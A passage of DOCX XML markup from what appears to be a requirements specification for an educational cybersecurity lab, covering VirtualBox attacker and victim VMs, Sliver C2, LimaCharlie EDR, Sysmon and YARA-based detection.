        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LimaCharlie EDR:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Functions as an Endpoint Detection and Response (EDR) tool. It collects system logs from the victim machine, analyzes them for suspicious activities, and facilitates the creation and execution of pre-defined responses (D&amp;R rules) to identified threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>YARA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Acts as a malware identification tool. It allows you to define and utilize YARA rules based on specific patterns and characteristics of known malware. YARA can then scan files and processes on the victim machine to identify potential malware based on these predefined rules.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focuses on educational purposes and be suitable for production environments with further security considerations and testing.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Assumptions and Dependencies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Users have basic computer literacy and familiarity with operating systems.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Users have administrative privileges on the host system to install and run the required software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Stable Network Connectivity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system assumes stable network connectivity between virtual machines to facilitate communication and data exchange.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Dependency on Availability and Functionality of Tools:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system depends on the availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a good knowledge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> using  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox, Sliver C2, LimaCharlie EDR, and YARA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>along with the system requirements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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> External Interface Requirements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User Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall provide a user-friendly and intuitive graphical user interface (GUI) to enable efficient interaction with various functionalities. The GUI should cater to users with varying levels of technical expertise and minimize the need for extensive technical knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Specific functionalities accessible through the UI shall include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Virtual Machine Management:</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Create, start, stop, and delete virtual machines representing attacker and victim systems.</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Configure virtual machine settings, including operating system, network interfaces, and resource allocation.</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Monitor the status and resource consumption of running virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>D&amp;R Rule Management:</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Create, edit, and delete user-defined D&amp;R rules for specific threat scenarios.</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Define triggers based on various criteria, such as specific system events, log entries, or file activity.</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Specify predefined actions to be taken upon triggering a rule, such as blocking malicious processes, isolating infected VMs, or sending alerts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Threat Detection and Analysis:</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View and filter detected threats based on severity, source, and timestamp.</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Access detailed information about detected threats, including associated log entries and affected files.</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Visualize threat timelines and relationships between different events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>YARA Signature Management:</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Import and manage YARA signature rules for identifying specific malware or suspicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>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Configure scanning parameters, such as the files and directories to be scanned and the frequency of scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>View reports and alerts generated by YARA-based malware detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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Hardware Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall have minimal hardware interface requirements beyond the standard hardware components of a personal computer, including:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Processor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Modern processor with sufficient processing power to run virtual machines and supporting software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Memory (RAM):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Minimum of 8 GB RAM, with 16 GB or more recommended for optimal performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Storage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Approximately 80 to 100 GB of free disk space to accommodate virtual machine files, logs, and software installations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Network Interface Card</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(optional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard network interface for internet connectivity </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="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Software Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>VirtualBox:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall utilize VirtualBox to create and manage virtual machines for the attacker and victim simulations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sliver C2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall integrate with the Sliver C2 framework to establish C2 communication between the attacker and victim VMs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sysmon: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system may optionally integrate with Sysmon, an advanced system monitoring tool, to collect detailed logs from the victim VM for enhanced threat detection and analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">LimaCharlie EDR: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall integrate with LimaCharlie EDR to:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Collect system logs from the victim VM.</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Analyze logs for suspicious activity based on pre-defined rules and user-defined D&amp;R rules.</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Manage and execute D&amp;R responses based on identified threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall leverage YARA for automated malware identification:</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Users can import YARA rules from online repositories or create custom rules.</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The system shall scan files and processes on the victim VM based on defined YARA rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3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Upon detection of potential malware based on YARA signatures, the system shall generate alerts and provide relevant information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Communications Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall facilitate secure communication between the following entities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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 xml:space="preserve">Virtual Machines (VMs): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The attacker and victim VMs shall communicate within the virtual network environment created by VirtualBox. This simulated network environment allows them to interact without affecting the host system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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 xml:space="preserve">LimaCharlie EDR Server: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The system shall establish a secure communication channel with the LimaCharlie EDR server using protocols like HTTPS to ensure the confidentiality and integrity of transmitted data. This communication allows for log collection, D&amp;R rule management, and threat notification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>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b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>YARA Online Repository (Optional):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Depending on the chosen update method, the system may require internet access to communicate with the YARA online repository for downloading and updating malware signatures. This functionality can be disabled if users choose to manage their own YARA signature library.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3.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
